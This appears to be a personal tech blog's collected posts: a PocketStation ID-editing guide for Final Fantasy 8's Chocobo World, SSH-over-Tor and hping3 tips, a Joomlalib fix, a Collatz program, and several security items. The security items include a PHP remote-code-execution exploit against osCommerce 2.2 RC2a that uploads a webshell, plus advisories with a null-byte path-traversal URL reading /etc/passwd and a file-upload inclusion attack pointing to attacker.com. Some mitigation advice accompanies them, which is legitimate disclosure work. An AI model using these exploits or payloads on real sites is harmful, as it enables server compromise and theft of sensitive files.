How to get Optimum Rank for a Chicobo in Chocobo World of FF8

This text was originally posted at psx-scene.com by dlanor on 07-06-2009,05:42 AM

---

I recently acquired a PocketStation unit (abbreviated "PS" below), mainly intended for use with Final Fantasy 8 and its 'Chocobo World' minigame. And like many users before me I was seriously irked by the knowledge that the production ID of my PocketStation unit would forever handicap its use for FF8, since it was not a 'good' ID (according to Chocobo World ranking methods) and the rank upgrade method Square had intended to be used for this game simply is not available in the western world.

In Japan players can upgrade their chicobo rank by letting it battle another chicobo in another PS using IR communication, but this is only meaningful if another player with a better rank is available, which is not the case here (Sweden for my case) where PS units are very very rare.

So I started searching for all available info and downloads related to the PS, and soon found that a number of various programs are available, these being both minigames and tiny utilities. And one that I found had the intriguing name "Rewrite ID". And it turned out to be exactly what I needed.

This program simply displays two text rows holding 8 Hex digits, with an editing cursor placed at the start of the top row. At first the two numbers will be identical, since the top number is then just a copy of the bottom number, which shows the current ID of the PS. The top number represents what new number you want the unit to get, and this can be edited by the following controls:

Left / Right => move the cursor left / right to select the digit to edit.
Up / Down => raise / lower the value of the current digit by 1
Action button => current value is stored as new PS ID

Now consider my own case for example:

My tests with Chocobo World originally gave me an ID of 435, which is rank 7
(A majority of the PS IDs give Chicobo rank 7, this being the worst rank existing)
That ID is really the 3 lowest decimal digits of a 24 bit part of the full 32bit ID of the unit.

The full ID, as shown by "Rewrite ID" was 421EFB63, which matches the code printed inside the PS cover in an odd way. That code is B02030435, where the letter B has the ascii code 42 in hex, while the decimal number 2030435 corresponds to 1EFB63 in hex, so when we put these together we get the full ID as shown by the "Rewrite ID" utility.

Next I needed to calculate what to enter in order to get an ideal ID, resulting in a rank 1 chicobo. In order to get that I would need Chocobo world to show an ID of 211 (according to the best FAQ on this matter), so 211 should be the final digits of the decimal number corresponding to the last 6 hex digits of the full ID. Thus I took the original value of that part and changed it into 2030211, which I then converted into 1EFA83, making the full new ID 421EFA83.

So that is the value I edited into the top line of the display, after which I pushed the 'Action' button at which the program copied this number into the bottom line, signifying that this was now the active ID.

Next I transferred a normal FF8 gamesave onto the PS and booted FF8 to load that save, and then used the save menu to download the Chocobo World into the PS and 'Sent Boko' to that 'World', after which I made a new save (so the sending is recorded in it, so it can later receive Boko back 'Home' again).

And then for the moment of truth, inspecting the new Chicobo data, which turned out exactly as good as I had hoped. Here is a comparison between the Lv1 chicobos using my old ID and my new ID.

Old => ID=435 HP=6 Weapon=2,1,1,1 => Deduced rank = 7
New => ID=211 HP=16 Weapon=4,3,3,3 => Deduced rank = 1

This also means that in the new minigame I can expect 25% of all found items to be class A, as compared to the zero chance I had with the old game.

The only drawback of this method is that it can do nothing for a "Chocobo World" game already existing. You need to create the Lv1 chicobo on the PS after changing its ID. Just resending an old chicobo from 'Home' to 'World' will not make it adopt the new ID, even if you force a new upload of the game itself by having deleted the old copy from the PS before sending Boko to 'World'.

Now for the part that lets you do the same thing I did:

The attached ZIP file contains the "Rewrite ID" program in a form that is ready for direct copying to the PS, which you can easily do on a PS2 running uLaunchELF (aka: uLE). Just use the FileBrowser of uLE to copy the file named "XXXXXXP-RESER" exactly as it is into the PS directory, which is either mc0:/ or mc1:/ in the uLE FileBrowser, depending on which MC slot you used for the PS.

Then remove the PS from the PS2 and use the PS menu to launch the program displayed as two rows of numeric digits with an arrow between them. And from that point on you can refer to my instructions above for the editing. Just remember to exit the program afterwards (press action button until you can choose "EXIT"), so that no accidental ID change occurs after the one you wanted. And for the same reason it is a good idea to also delete that program from the PS once its work has been done.

Best regards: dlanor

Rewrite ID (1999)(K-Comm).zip

SSH over TOR on OSX (Yosemite, Mavericks, Mountain Lion, Lion, Snow Leopard)

After a lot of search and try, finally I could manage to connect through TOR on my server via SSH, most the search result points to the same command, which is incomplete for Mac OSX, here is how you can connect to any ssh server over tor:

ssh -o ProxyCommand='nc -X4 -x 0:9150 %h %p' user@host

with -X (caps) you specify to netcat the proxy version you are using, in this case SOCKS4.
Taken from the man page:

-X proxy_version

             Requests that nc should use the specified protocol when talking to the proxy server.  Supported protocols are ``4'' (SOCKS v.4), ``5'' (SOCKS v.5) and ``connect'' (HTTPS proxy).  If the protocol is not specified, SOCKS version 5 is used.

So, if you were trying using netcat with the 'connect' argument for -X it will not work because that TOR port is SOCKS4 and not HTTP proxy.

I hope you find this info useful.

PD: I used 0 on hostname parameter because its the same as 127.0.0.1, or localhost.

Problems installing hping3 on Mac OSX

If you have troubles trying to install hping3 on Mac OSX from MacPorts or even from the source, I found this solution doing some searching:

First grab the source from here, then add -D_FORTIFY_SOURCE=0 to CCOPT in the Makefile. Your Makefile should be like this:

CCOPT= -O2 -Wall  -DUSE_TCL -D_FORTIFY_SOURCE=0 

then try to compile again and it will work fine.

osCommerce Online Merchant 2.2 RC2a RCE Exploit and Fix

osCommerce Online Merchant 2.2 RC2a RCE Exploit


Fix
If you use are using osCommerce 2.2 RC2a that comes in some many webhosting packages by default, one solution from being hacked with the default installation is to add to the .httaccess
this line:



AuthName "Restricted Area" 
AuthType Basic 
AuthUserFile /home/yourusername/oscommerce-folder/admin/.htpasswd 
AuthGroupFile /dev/null 
require valid-user


and create an .htpasswd file with your admin username with this line:


admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1
(Note: the above password is 1234, do not use as your password)




Exploit
Code from milw0rm:

<?php
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

Joomlalib issue about path (Dirty Solution)

Im not good writing so lets fix this.


Problem:
You have Joomla 1.5 and want to install Joomlalib with Gallery2 Bridge then when trying to install Joomlalib 1.3.2 you got this:


Warning: require_once(/components/com_joomlalib/classes/jlcoreapi.class) [function.require-once]: failed to open stream: No such file or directory in "yourpath"/administrator/components/com_joomlalib/install.joomlalib.php on line 11.


when trying to install Joomlalib 1.3.2


just replace this: 
require_once($mosConfig_absolute_path . '/components/com_joomlalib/classes/jlcoreapi.class');


with this:
require_once($yourjommlapath. '/components/com_joomlalib/classes/jlcoreapi.class');


$yourjommlapath could be: /home/user/jommla


maybe late i could format this post :)

3n + 1 problem

#include

int main(void)
{
int num;
printf("insert number:\n");
scanf("%d", &num);
printf("%d ", num);
while(num != 1)
{
if ((num%2) == 0)
{
num = num / 2;
}
else
{
num = (3 * num) + 1;
}
printf("%d ", num);
}
printf("\n");
}

Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

[Description]
SLAB500 is a complete, dynamic, modular web-system designed to your specifications, allowing you to quickly and conveniently update all your content, add new pages, upload images, sounds and video from any browser, via our front-end interface from any location that you have web access.
-- taken from they website http://www.slab5000.com --

I discover 2 bugs one known as "path disclosure" and Arbitrary File Read Vulnerability in the SLAB5000 Content Management System that allow malicious attacker to read sensitive information about the system.

[Path Disclosure]
Due to improper sanity checks in the variable $page:

http://www.server.com/index.php?page=../../../var

Warning: main(/usr/www/users/username/slab500/common/../../../var/index.php): failed to open stream: No such file or directory in /usr/www/users/usernameb/slab500/folder/index.php on line 63

[File Read]

Due to imporper sanity inputs checks too, just adding the NULL byte and the end of the file:

http://www.server.com/index.php?page=../../../../../etc/passwd%00

[Solution]
Edit the source to do sanity input checks as well.

Sorry if my english is bad :)

Justin_T
irc: #nt at Undernet
shoutz: warcold, KrOsS, HoOH, lsdx, jsz, and all the guyz from DO.

a path disclosure and a posibility file inclusion and vulneability in thepeak file upload v1.3

Justin_T

#NT - Undernet

justint (at) orangemail.com (dot) do [email concealed]

hi,

there is a posiblity path disclosure and run commands on a server usint thepeak File Upload v1.3

searching for /fileupload/index.php an attacker can upload a malicious jpg of gif and can execute commands or make a file inclusion,

but it cant be directly to upload a php file with .jpg extension, because detect the content type as text/plain, look this:

name : cmd.jpg

type : text/plain <--- when you upload the file the content type is seem like this

tmp_name : /tmp/phpF0AItw <-- this is a copy of the file in the server with a ramdom temp

error : 0

size : 26564

http://server.com/fileupload/store/cmd.jpg <--- this is where is stored the original file

there is a 2 ways to get in

cracking the content-type when uploading the file or constructing an malicious jpg image with some commands:

1: chmod the dir for file inclusion

2: run certain commands on server, etc

Path Disclosure

when you try to put in input of upload file something like

http://www.attacker.com/command.jpg its seem the path of the web files like this:

File Upload Manager v1.3 © thepeak

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 0

Warning: copy(store/http://www.attacker.com/cmd.gif): failed to open stream: No such file or directory in /home/user/public_html//fileupload/index.php on line 471

ERROR: cannot upload, please chmod the dir to 777

some servers accept the file inclusion and you get this

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 1035

file uploaded!

sorry for my english, is no good :), if you want to organizate this info i apreciated that, thanx :)